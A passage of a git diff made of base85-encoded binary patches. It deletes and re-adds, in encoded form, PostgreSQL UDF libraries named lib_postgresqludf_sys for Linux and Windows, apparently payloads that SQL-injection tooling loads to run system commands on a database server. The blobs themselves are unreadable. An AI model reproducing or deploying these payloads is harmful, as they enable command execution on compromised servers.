HcmV?d00001

diff --git a/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so
deleted file mode 100755
index 7c29ff7a3505d7037a23a686a82d69273bbfb942..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 7920
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

diff --git a/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..43c4427f9f672b47020eef610ee2ecc9b51864bf
GIT binary patch
literal 3213
zcmV;8407`aoV_Lj4=dGbzx!@CU%XRiUxL7bT`mrray^1K&C7Va(8P9G!4-4M8MDc*
zS-b1*bXtg-x_~Ca70UE*>mPVxrcDX7Gp7n~YNCNZL`r&AilZw072h>)sCO5D?M4Xi
zS_ojfgZ-yS4D$r%2+v0M+|LN_+gMeqmS=K#!jp;ol%N}Cmyk4PAdm<;dbk};b^b6~
zET|EAHlNnzSzKNz`e5xjKJFa@D6UF&w`OeoF&wg;k=gAZ2}GDd$062hj+xBb%(A|m
z<1$-j&2tpKEt~NM?u3M_#~G50+!03Dja@)Ni4GmpGmw|wEHJwBiiTvK-ALxCz3<Lc
z1*;bn>Dh{1)SGffV6w#Y5QIZ^@?+-bMTQ(^89u%ysCdKY;~9ZNdh%0Q^FhE?PnFe5
zd<}8r6Ddh<@=M5*nT*pM=8qTW^;Wn}!n4>Iyihnio&j>dDahm5OwMjBb)95{7*o$2
zy66A`iB{8X$^J43Nr_=oFq9sfu~2m=)-vDW*-W9d;^>gAwGsNujzVk+0I?dKqxy@P
z%ORQd1L1TSWR61e^JED+&o{F|EOdCr{qA5OU`ATCYhp%55R2#XN<D`s#*nVD$=q?0
zXIugWNOB+@H_cEp!<*Ca+tT>|S8@PLazIdx03#9BYy3=GPH^?9R*nDL)A-+?IY3m6
z{@zRa4ASTzGot`xHr-L246`lpP?6N_LZ8O}RFuzId@ViZ>jzxpL}nn(_+@<hKy0@$
zF^=j^rvHe}&lHSc8~lfi2u?tHML;ZbcKs#RcVyc*Ko|ib$~N{O&G=B+1f_uS_oa!`
zJ@v04Xjqt^Ku`Z9W&lXzKw+07?_0``TzJP=xnAQY{6Mo?>jasfBi3+@+`!=%68HOK
zUe#tRVsYZ|`n**Rw0}R56pd_Pof6))5#lGd+77R~)nqN*!LmshSLAV#nkhKDv(@Vj
zv<vtnI|{EZVtz{KFa2?s$7aMB((V%!^Sg-4Y~(s4je8~01dHEp>T^ci6x>l8n%%13
zW-VgPF}0(eKZ)uQSb>(H+pW_e?Gs#n0Kn~BJ_w?YkY)6_eVwGG)vbm%z}4n(>5Q7Z
zK^52Ha6yc|A^{+D77z$|$WWXiO5hSPDG>3txxofZ=o~^)Ubp)m(xSTCz&yePbW#!X
zNx2hVzY=~9xLy%h3nDC6l;|s<1I-&2DjF7<qtGcAn=rfG2i4!zQy$q5jX*PqG;>@O
zuN;a<bP_@n{^qd;$me{Qi&$E3-!S5oQ*QVpfhc<cqQC@aK$<$uEI;7I2-jtSNOS|2
zz>DXv5rJsmrM-PXCE%ZG_%nguS@0%(zdYcreZMT=#rOG9fzN69L4jac@OXM5ZTLKW
zpIq?Adm-E~k954a^h$wf_u12Z0G+@fZwC%z$>eSUl0O)A{2PI{cl=|4D8f9M+AL4`
zv?fntv@~Wn?aS<s&)-7EHR7}1g#SiNHQ;s{aGJ!9$6n3;T*^lj9EYg<P0B~59Re!>
zZW^35v7IXcaT=UGu@WoZf=w}<Cs370p^Pk9);i@_F2)ZWepRnJW~Vn3YL$am<J5@N
zFZo`S4(J?OD-k_rmo=<_%5b2JEMFO=^1WB%(8p6NA%;zH28=JcYZ_zf*y+nx--)t?
zwx7y{SC6Odr}C{=Fre+H@>7(rqwS~iYm^KY`>8{I<%zWYUyI|R^cyqFvTYhXpB0Q?
zqQlY4ECSaZa>|Hp`8BSq?H4V=i+0Ktw$iise?t~N53W0>Qe_faD$&^te!$-(FD(ko
zXv*8eSy}_api@I>vgXWJ$NKtnHCy8bSC`|t`#%bFDZTI~@T-B0$Klb?UqIN{-;zum
zLW>ZwNp<S0hkw*op#B#bT`j3DiBVyMqWBJ+P>pZ0ZOxc@eBK}+t2>4i1p)H*HXQh*
zM*5gO4#l;37qsF<syjRxS`9ymWBv*IfZ07^7Z>c8>s7-5izqrltGAz1>DJKtK(AHj
za8%JTlL=hfIzcL3?|^-jRgo~DZ;11UquDNF-^gcIeo-YAd9upzX7vE*+wF3V@`L?v
z)CriC{SCb%c#XI#yFKX!!m7OncHM#@zxGrItc>h@HY9$JDv<!ok^S26Ixi>G7b;Al
zO%i204nX=;j~5MGMXjYV?~^DihIr%D22zX~VG8ayN7ssf_u@&afWvq%!1a6z7S*V3
zoj@1FvMhY~zuy5ZBr-hN0HVa+cpfV{&LbA;@&^VB-8*fmyH+d?ovaI;*AaT%VQZrZ
z<tRG-Dq*>ML2K6p+VYFoh_CnH+I~>lbl8$|0%E_fik#BcgV42zsOTD?{I*A~{zIsI
z+gV7;R2n!FMvYP&wUPHF?PO=RBRtz_IS`Tk<w7Y^aBIV8$hwC_?w8+TP42}+lL>pu
z<?xUuiFx8`_P;B;zO1nK+2hNi=9`uC@4t=+w%xeOm6?3nc*EdS1Ad#V-mE)B%qo%3
zq2F~u(xNY2$B&+{?8d6?=UsU0U>0?_30ILEi6;(k-bf#eROI@~$XZE#DP`qA(F_aS
zGDgtJK`#YjXzsV$4lg03I`ivt*y(sxTzr~Z(LT@u6`B3q5!}-+@%0`>^Rys++TXLE
zlMappHSHP?G8pxS9vQm7TxfK^`+jwJRq}K8zSw!{=fgGECfaukM({ks<zF9W_g>Ql
z`t1T(84;?>U)_hppXc-f5Z)`7n{5757%VCYF$f}=p+vhgiTBBL_c{#8Y+zTe2*A&P
z**k6Ri35tW6;=uWHM{$GoPOuEU5dvZh^+$yI0<RCzreb#8k^7#TvHNfarFh*Fpg*O
zI)CzsGuV>_Gbhjvc}S;uy4LYR;-KSr+ttYXS~r3+q`)CZ?~eI&ii&8;r5fdGG=%qX
z-Z0jiZQoGvaw<J-2(*+2sus~zl1KmSgsRql?tT19&P>2aepDaqhJUMm@s9ap;39xf
zeb#<KbqotsA7}6|fJ`4=aDL8yOJq3CFNU@EZNp`Y9u@ZJGyFM|%N?C`^@!(dyr18J
z8o<*;g;OR;Wg1pc6IGY2tu0~5vXnOFJ<)@xa0T=;AXO$wWNKCrqZWx9a+{5nE43>f
z&auADkeBP~!@9N{O28;gKrS4ql(*SiG}evg4OT#$UNm~0EkVd{c$6rBEcEwI<Z49#
z@O57pUQmAiJm&9a^!H1~YD$+i`J2(-#xAleV__mu)o1@xYL_&6vXmfICNvg$Z%X>d
z0sdb)yx8w}fZv*3A!g$uRcdEQH~Hm5ALbBD*xd>7>Ib)cKxzjC=X~|2(IC_-UM5JR
zzl~=Q2Wx~Cnj4^j$~~Z4M#UyISo6fcFHs(F{8P#Ahx~KN?*{y=yo>1o2uAKWyufkY
z{LGxsal`zq>>h^@0fs7>LO}EL&!GH_A;Zpx{8JDfa06lUvq?a7d9soQbdv_ZtR2YD
z+`K_2VN3qgGfvJM-cYBRyp@#zuT=j4TK-}wpCKAzxQF3i!!Tz7!|+W!iE{7@hDnA%
z8V7L0m2(1fU>NvI!{1E<mEmEAgL6P0_;SO`bNRgx7AD!9*8B|!lh^69-X0_$RJh$C
z4|D>uBy@D__Ja9^bgcP-U)%uO+|H2uX^2YXfn>Jo6J1H4APU<h0%EqNaS$Z)?GF&9
zlE-H9ZzK$-P}JF;Ke*-7lGW}X$m{o7c5zpH?=dSIFo8*x*yvbyWC2=VN%~&GY4p=1
zwax7gw0oWH5r?NnM_q24H1&8qFCKki4SE*k&Izw{RrIU$Ai@a3a3jva$lu=X_Ni8f
z^#CzPyyD$R-3SMs%tdCur5bnk0|E@Z%a9XT0Vv0W7@`cYNw`Aaa7VW3^!58HK@@zq
z=lgocL54%dRNroA;zY_@*z^5|qpBpZ`t>9;Z4{r|^YzZLIcUEwhiY4~mk*imSYxdl
zTLFBzy8Q~w_m%xoRAwmY>esgbrOux3hhzEviA5YN*aXPP5IC6l{?9J>nN?PCo+Cy3
z7{^&0KiA>ho&Y59>FoLM8)FFRRn!3EDhl@e0>v)U>FeVl%j^dKVql+)Dn$YU{V?k6
z)BT>6uKppN0`G(yW774X0sceB?D_i)<Osji@#^g$(AoF$-~9ok{c)ZBN&W;J5fuWx
zjNjoncJ^GqK(YrX`}z5T+w-^~)78(vRB5x1H~RUTsl!MM_Wb-V!|ZS&!vUYpp1<ev
zSy=1o?FRZ(<G4cq5fB>o*XsYjv-)%kL${x&<8oF{)er==%>E~31fKqMLJ&1YT^wbL

literal 0
HcmV?d00001

diff --git a/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll
deleted file mode 100755
index 342d45a081ecf471591b59376d18d62ff454fdc7..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6656
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
